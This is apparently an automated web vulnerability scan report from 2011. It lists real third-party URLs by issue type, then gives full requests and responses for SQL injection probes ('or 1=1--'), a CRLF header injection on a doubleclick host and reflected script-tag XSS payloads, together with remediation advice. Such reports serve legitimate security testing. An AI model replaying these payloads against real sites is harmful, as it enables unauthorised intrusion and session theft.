24.16. http://iinet.122.2o7.net/b/ss/iinet-wn-prd,%20iinet-westnet-prd/1/H.21/s66183478690218

24.17. http://j2global.122.2o7.net/b/ss/j2globalonebox/1/H.23.3/s62614785584155

24.18. http://l.addthiscdn.com/live/t00/152lo.gif

24.19. http://media.extole.com/campaigns/onebox/images/favicon.ico

24.20. http://met1.hp.com/b/ss/hphqglobal,hpcsamerus,hpcsglobal,hphqna,hphqwwesg,hpcstsg/1/H.22/s64758445019833

24.21. http://myhelp.westnet.com.au/pages/releaseview.action

24.22. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.23. http://now.eloqua.com/visitor/v200/svrGP.aspx

24.24. http://onebox.extole.com/offers/23073174/start

24.25. http://pagead2.googlesyndication.com/pagead/imgad

24.26. http://pixel.fetchback.com/serve/fb/pdc

24.27. http://printingcanvas.co.uk/

24.28. http://pro.hit.gemius.pl/_1305465394383/rexdot.gif

24.29. http://pubads.g.doubleclick.net/gampad/ads

24.30. http://r.turn.com/r/beacon

24.31. https://secure1.wn.com.au/passwordrecovery/

24.32. http://segment-pixel.invitemedia.com/pixel

24.33. http://shop.widevoip.com/statistics.php

24.34. https://shop.widevoip.com/index.php/index.php

24.35. http://smartsourcecollector.cardinal.com/dcsk07f7w00000kvtj6ne2kwn_1y4m/dcs.gif

24.36. http://store.mandriva.com/

24.37. http://support.magneticone.com/visitor/index.php

24.38. http://t.tmimgcdn.com/themes/default/css/main.css

24.39. http://toolbarqueries.clients.google.com/tbproxy/af/query

24.40. http://tvgids.upc.nl/scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json

24.41. http://upc.d2.sc.omtrdc.net/b/ss/upcnl/1/H.22.1/s73489850417245

24.42. http://www.123stat.com/wtslog.js

24.43. http://www.3dcart.com/oscommerce_vs_3dcart.html

24.44. http://www.active24.co.uk/

24.45. http://www.active24.com/

24.46. http://www.active24.no/graphics/design/favicon.ico

24.47. http://www.allvoip.gr/

24.48. http://www.antarctica.gov.au/

24.49. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

24.50. http://www.burstnet.com/enlightn/3847/F156/

24.51. http://www.cvtelecom.cv/

24.52. http://www.ezosc.com/

24.53. http://www.gitzitinc.com/store/

24.54. http://www.google-analytics.com/__utm.gif

24.55. http://www.google.com/uds/Gfeeds

24.56. http://www.googleadservices.com/pagead/conversion/1071977981/

24.57. http://www.grics.qc.ca/

24.58. http://www.hp.com/edsredir/

24.59. http://www.internetnatrgovina.com/

24.60. http://www.ipandgo.net/

24.61. http://www.mailsite.com/

24.62. http://www.medianewsgroup.com/

24.63. http://www.mmabasket.com/

24.64. http://www.onebox.com/

24.65. http://www.oscommerce-manager.com/

24.66. http://www.redstage.com/magento2

24.67. https://www.regnow.com/checkout/cart/view

24.68. http://www.servercentral.com/

24.69. http://www.shopgrandmasattic.com/

24.70. http://www.templatemonster.com/oscommerce-templates.php

24.71. http://www.turk.net/Assets/css/dropdown/dropdown.css

24.72. http://www.upc.nl/upclive/

24.73. http://www.verizonbusiness.com/us/

24.74. http://www.vitexo.de/

24.75. http://www.westnet.com.au/index.html

24.76. https://www.widevoip.com/shop/index.php

24.77. http://www.wiktel.com/

24.78. http://www.woosh.com/

24.79. http://www.yourwebsitevalue.com/getsearchbox.cgi

24.80. http://www.youtube.com/v/ERP00q_xcuQ

24.81. http://www5.turk.net/twitter_net/default.aspx

24.82. http://www8.hp.com/us/en/services/it-services.html

25. Cacheable HTTPS response

25.1. https://mobile.westnet.com.au/

25.2. https://mobile.westnet.com.au/Default.aspx

25.3. https://myaccount.westnet.com.au/Login.aspx

25.4. https://secure1.wn.com.au/agents/login.aspx

25.5. https://secure1.wn.com.au/agents/lost_password.aspx

25.6. https://secure1.wn.com.au/passwordrecovery/

25.7. https://shop.widevoip.com/authentication.php

25.8. https://shop.widevoip.com/cart.php

25.9. https://shop.widevoip.com/img/favicon.ico

25.10. https://shop.widevoip.com/index.php/index.php

25.11. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

25.12. https://shop.widevoip.com/prices-drop.php

25.13. https://webmail.westnet.com.au/

25.14. https://www.regnow.com/checkout/cart/edit

25.15. https://www.regnow.com/checkout/cart/view

25.16. https://www.regnow.com/eds_new.html

25.17. https://www.regnow.com/favicon.ico

26. Multiple content types specified

27. HTML does not specify charset

27.1. http://chadon.nl/favicon.ico

27.2. http://chadon.nl/server-info

27.3. http://chadon.nl/st/js/jquery.min.php

27.4. http://chileadmin.com/phpinfo.php

27.5. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv

27.6. http://content-interface.iinet.net.au/async/content/play/video/high/5619

27.7. http://corporate.britannica.com/navigation_pane.html

27.8. http://d.xp1.ru4.com/um

27.9. http://fls.doubleclick.net/activityi

27.10. http://hostdotbr.com/favicon.ico

27.11. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.12. http://shops.oscommerce.com/directory/goto,21173

27.13. http://shops.oscommerce.com/directory/goto,25203

27.14. http://shops.oscommerce.com/directory/goto,26271

27.15. http://shops.oscommerce.com/directory/goto,26272

27.16. http://shops.oscommerce.com/directory/goto,28398

27.17. http://shops.oscommerce.com/directory/goto,29108

27.18. http://shops.oscommerce.com/directory/goto,34234

27.19. http://shops.oscommerce.com/directory/goto,38927

27.20. http://shops.oscommerce.com/directory/goto,41852

27.21. http://shops.oscommerce.com/directory/goto,43516

27.22. http://shops.oscommerce.com/directory/goto,43678

27.23. http://shops.oscommerce.com/directory/goto,43679

27.24. http://shops.oscommerce.com/directory/goto,43680

27.25. http://shops.oscommerce.com/directory/goto,43683

27.26. http://shops.oscommerce.com/directory/goto,43684

27.27. http://shops.oscommerce.com/directory/goto,43685

27.28. http://shops.oscommerce.com/directory/goto,43687

27.29. http://shops.oscommerce.com/directory/goto,43688

27.30. http://shops.oscommerce.com/directory/goto,43689

27.31. http://shops.oscommerce.com/directory/goto,43690

27.32. http://shops.oscommerce.com/directory/goto,43691

27.33. http://shops.oscommerce.com/directory/goto,43692

27.34. http://shops.oscommerce.com/live_shops_frameset_header.php

27.35. http://trip11209.cz.cc/js/jquery.min.php

27.36. http://www.3dcart.com/oscommerce_vs_3dcart.html

27.37. http://www.active24.co.uk/custom_asp/defaultjs.asp

27.38. http://www.excelldirect.com/

27.39. http://www.mailsite.com/

27.40. http://www.mailsite.com/Contacts/default.asp

27.41. http://www.mailsite.com/common/reporterror.asp

27.42. http://www.mailsite.com/company/customers.asp

27.43. http://www.mailsite.com/contacts/

27.44. http://www.mailsite.com/favicon.ico

27.45. http://www.mailsite.com/portal/

27.46. http://www.mailsite.com/portal/cases/

27.47. http://www.mailsite.com/portal/cases/cases.asp

27.48. http://www.mailsite.com/portal/download.asp

27.49. http://www.mailsite.com/portal/trial.asp

27.50. http://www.mailsite.com/portal/unsubscribe.asp

27.51. http://www.mailsite.com/portal/updateprofile.asp

27.52. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

27.53. http://www.mailsite.com/support/

27.54. http://www.redstage.com/magento2/

27.55. https://www.regnow.com/favicon.ico

27.56. http://www.teleflora.com/

27.57. http://www.teleflora.com/js/tf_homepagejs.asp

27.58. http://www.turk.net/images/ana_header.jpg

27.59. http://www.vitexo.de/support/server.php

27.60. http://www.yourwebsitevalue.com/getsearchbox.cgi

27.61. http://www.yourwebsitevalue.com/getsearchvalueex.cgi

28. HTML uses unrecognised charset

28.1. http://finans.turk.net/altin/

28.2. http://finans.turk.net/borsa/

28.3. http://hostdotbr.com/

28.4. http://www.allvoip.gr/

28.5. http://www.echalk.com/

28.6. http://www.echalk.com/impact/on-the-road/

28.7. http://www.echalk.com/impact/what-echalk-means-to-me/

28.8. http://www.mavi1.org/

28.9. http://www.mavideniz1.org/

28.10. http://www.mavideniz1.org/orta.htm

28.11. http://www.onbile.com/websites/0521accad976e199620f2fe160d311fa

28.12. http://www.siyamiozkan.com.tr/

28.13. http://www.siyamiozkan.com.tr/orta.htm

28.14. http://www.turk.net/

28.15. http://www.turk.net/mansetFrame.asp

29. Content type incorrectly stated

29.1. http://action.media6degrees.com/orbserv/hbjs

29.2. http://allvoip.gr/favicon.ico

29.3. http://cfe713.r.axf8.net/mr/a.gif

29.4. http://chadon.nl/st/js/jquery.min.php

29.5. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv

29.6. http://content-interface.iinet.net.au/async/content/play/video/high/5619

29.7. http://foto.turk.net/sinema/movieImages/13052011114033_222.jpg

29.8. http://hc2.humanclick.com/hcp/html/mTag.js

29.9. http://hostdotbr.com/favicon.ico

29.10. http://hp-www.baynote.net/baynote/tags3/common

29.11. http://intelligence.dgmsearchlab.com/xdom/readcook.ashx

29.12. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml

29.13. http://mods4rides.com/images/i=ELocker-Dana304pinon.jpg&partNo=EAT&w=380

29.14. http://myhelp.westnet.com.au/s/1116/1/5/_/includes/js/yui/fonts/fonts-min.css

29.15. http://myhelp.westnet.com.au/s/1116/1/5/_/includes/js/yui/menu/assets/menu.css

29.16. http://myhelp.westnet.com.au/s/1116/1/7/_/includes/js/yui/fonts/fonts-min.css

29.17. http://myhelp.westnet.com.au/s/1116/1/7/_/includes/js/yui/menu/assets/menu.css

29.18. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.19. https://shop.widevoip.com/cart.php

29.20. https://shop.widevoip.com/img/favicon.ico

29.21. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

29.22. http://tags.mediaforge.com/js/189

29.23. http://teleflora.edgesuite.net/Images/vendors/00005557/spring-submit-vd.jpg

29.24. http://trip11209.cz.cc/js/jquery.min.php

29.25. http://webchat.rockliffe.com:9090/webchat/common.js

29.26. http://webchat.rockliffe.com:9090/webchat/live

29.27. https://webmail.westnet.com.au/includes/javascript/menu_main.js

29.28. http://www.active24.co.uk/custom_asp/defaultjs.asp

29.29. http://www.amberetc.co.uk/ws/images/A1BR024.jpg

29.30. http://www.amberetc.co.uk/ws/images/A1BR024MIX.jpg

29.31. http://www.cardinal.com/mps/themes/html/Cardinal/favicon.ico

29.32. http://www.casagrandehospital.com/favicon.ico

29.33. http://www.corecommerce.com/images/favicon.ico

29.34. http://www.cvtelecom.cv/sites/default/files/cvtelecom_favicon.ico

29.35. http://www.echalk.com/favicon.ico

29.36. http://www.eshopfitters.co.uk/favicon.ico

29.37. http://www.facebook.com/extern/login_status.php

29.38. http://www.gelifesciences.com/ezm/profiles.nsf/ListInitialCountryRedirectsAsArray.js

29.39. http://www.google.com/mbd

29.40. http://www.google.com/search

29.41. http://www.ipandgo.net/favicon.ico

29.42. http://www.mailsite.com/quicklinks.js

29.43. http://www.mavi1.org/soultip.js

29.44. http://www.mavi1.org/yorumyaz.jpg

29.45. http://www.munichmyway.com/js/config.js

29.46. http://www.munichmyway.com/templates/common/products/productProperties.cfm

29.47. http://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/images/icons/green_tick.jpg

29.48. http://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/images/icons/homePano_phoneIcon_lrg.png

29.49. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans

29.50. https://www.new.onebox.com/ereceptionist-api/signup/getCurrencyType

29.51. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency

29.52. http://www.onbile.com/websites/0521accad976e199620f2fe160d311fa

29.53. http://www.pepperdine.edu/images/template/base/footerbg.jpg

29.54. http://www.redstage.com/favicon.ico

29.55. https://www.regnow.com/favicon.ico

29.56. http://www.teleflora.com/js/tf_homepagejs.asp

29.57. http://www.turk.net/mansetFrame.asp

29.58. http://www.vitexo.de/support/server.php

29.59. http://www.westnet.com.au/img/fetchtv/big_whitebox_top.gif

29.60. http://www.yourwebsitevalue.com/getsearchvalueex.cgi

30. Content type is not specified



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.cvtelecom.cv/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cvtelecom.cv
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20242989%20or%201%3d1--%20 and 20242989%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?120242989%20or%201%3d1--%20=1 HTTP/1.1
Host: www.cvtelecom.cv
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=pl2aq2cevdnsrm7538jfmi53u4; path=/; domain=.cvtelecom.cv
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:17:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr">
   <he
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-c62f92e3c588be673157d8dd883109c1" value="form-c62f92e3c588be673157d8dd883109c1" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>

</div></form>
                                                   </div>
                                                   <div id="mainMenu">
<ul class="menu"><li class="leaf first active-trail"><a href="/node" class="active">In..cio</a></li>
<li class="collapsed"><a href="/node/44">Empresa</a></li>
<li class="collapsed"><a href="/produtos_para_si">Servi..os</a></li>
<li class="collapsed"><a href="/horoscopo">Entretenimento</a></li>
<li class="leaf"><a href="/noticias">Not..cias</a></li>
<li class="leaf"><a href="/eventos">Eventos</a></li>
<li class="leaf"><a href="/node/50">Informa....es ..teis</a></li>
<li class="leaf last"><a href="/node/51">Links</a></li>
</ul></div>                                            </div>
                   <div class="cleaner"></div>
                   <div id="banner">
                                                   <div id="block-views-banner_home_page-block_1" class="clear-block block block-views">


<div class="content"><div class="view view-banner-home-page view-id-banner_home_page view-display-id-block_1 view-dom-id-1">



<div class="view-content">
<div class="item-list views-rotator views-rotator-banner_home_page-block_1 clear-block">
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-prev"></a></span>
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-next"></a></span>
<div id="views-rotator-banner_home_page-block_1">
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="field-content"><img src="http://www.cvtelecom.cv/sites/default/files/imagecache/banner_home_full/banner_cvt_1.png" alt="" title="" class="imagecache imagecache-banner_home_full imagecache-default imagecache-banner_home_full_default" width="673" height="260" /></span>
</div>
</div>
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="fi
...[SNIP]...

Request 2

GET /?120242989%20or%201%3d2--%20=1 HTTP/1.1
Host: www.cvtelecom.cv
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=1gp06061jt7aon6668v56u0eq0; path=/; domain=.cvtelecom.cv
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:17:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr">
   <he
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-7c2c668610fef194795457b4ae63e2c6" value="form-7c2c668610fef194795457b4ae63e2c6" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>

</div></form>
                                                   </div>
                                                   <div id="mainMenu">
<ul class="menu"><li class="leaf first active-trail"><a href="/node" class="active">In..cio</a></li>
<li class="collapsed"><a href="/node/44">Empresa</a></li>
<li class="collapsed"><a href="/produtos_para_si">Servi..os</a></li>
<li class="collapsed"><a href="/horoscopo">Entretenimento</a></li>
<li class="leaf"><a href="/noticias">Not..cias</a></li>
<li class="leaf"><a href="/eventos">Eventos</a></li>
<li class="leaf"><a href="/node/50">Informa....es ..teis</a></li>
<li class="leaf last"><a href="/node/51">Links</a></li>
</ul></div>                                            </div>
                   <div class="cleaner"></div>
                   <div id="banner">
                                                   <div id="block-views-banner_home_page-block_1" class="clear-block block block-views">


<div class="content"><div class="view view-banner-home-page view-id-banner_home_page view-display-id-block_1 view-dom-id-1">



<div class="view-content">
<div class="item-list views-rotator views-rotator-banner_home_page-block_1 clear-block">
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-prev"></a></span>
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-next"></a></span>
<div id="views-rotator-banner_home_page-block_1">
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="field-content"><img src="http://www.cvtelecom.cv/sites/default/files/imagecache/banner_home_full/banner_cvt_1.png" alt="" title="" class="imagecache imagecache-banner_home_full imagecache-default imagecache-banner_home_full_default" width="673" height="260" /></span>
</div>
</div>
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="fi
...[SNIP]...

1.2. http://www.oscommerce.com/about/news,135 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.oscommerce.com
Path:   /about/news,135

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about/news,135' HTTP/1.1
Host: www.oscommerce.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231096321.1305467786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); session_id=04312bf650bb8c4cb465ccf73be3ae4d; __utma=231096321.966955857.1305467786.1305467786.1305467786.1; __utmc=231096321; __utmb=231096321.2.10.1305467786

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:03:57 GMT
Server: Apache/2.2.17
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 51679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>


...[SNIP]...
<a href="http://www.oscommerce.com/about/news,32">TEP on PostgreSQL</a>
...[SNIP]...

2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dc131%0d%0a03859863396 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /dot.gifdc131%0d%0a03859863396?;ord=8268244 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vehix.com/tagFrame.aspx?ResourceID=B5000000000001&Width=300&Height=120&Parameters=Size%3D300x120%2CTile%3D3%2CWidth%3D300%2CHeight%3D120%2CSite%3Dveh%2CSegment%3Dhomepage%2CBrand%3DVehix%2CSection%3Dhp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifdc131
03859863396
:
Date: Sun, 15 May 2011 13:20:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)  previous  next
There are 191 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.ligatus.com/timeout.php [ids parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb330"><script>alert(1)</script>c8f40f3c5bb was submitted in the ids parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=20468cb330"><script>alert(1)</script>c8f40f3c5bb HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:55 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 15 May 2011 15:50:55 GMT
Connection: Keep-Alive
Content-Length: 117

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=20468cb330"><script>alert(1)</script>c8f40f3c5bb"></script>

3.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ee8"><script>alert(1)</script>10488149e13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=2/18ee8"><script>alert(1)</script>10488149e130468 HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:42:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 15 May 2011 15:52:25 GMT
Connection: Keep-Alive
Content-Length: 118

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=2/18ee8"><script>alert(1)</script>10488149e130468"></script>

3.3. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c6f80<script>alert(1)</script>ee62fdbac8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_71956589444c6f80<script>alert(1)</script>ee62fdbac8&pid=af7122e5-4c62-4cc3-8101-6135977842f7&s=125x125&f=0.1&cid=oxpv1%3A77279-136486-292439-24659-97363&hrid=706e05206430ac3829623829022d2dd1-1305468107&url=http%3A%2F%2Fwww.oscommerce-manager.com%2F%3F8b64d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed053e3a864d%3D1&referer=http%3A%2F%2Fburp%2Fshow%2F7 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
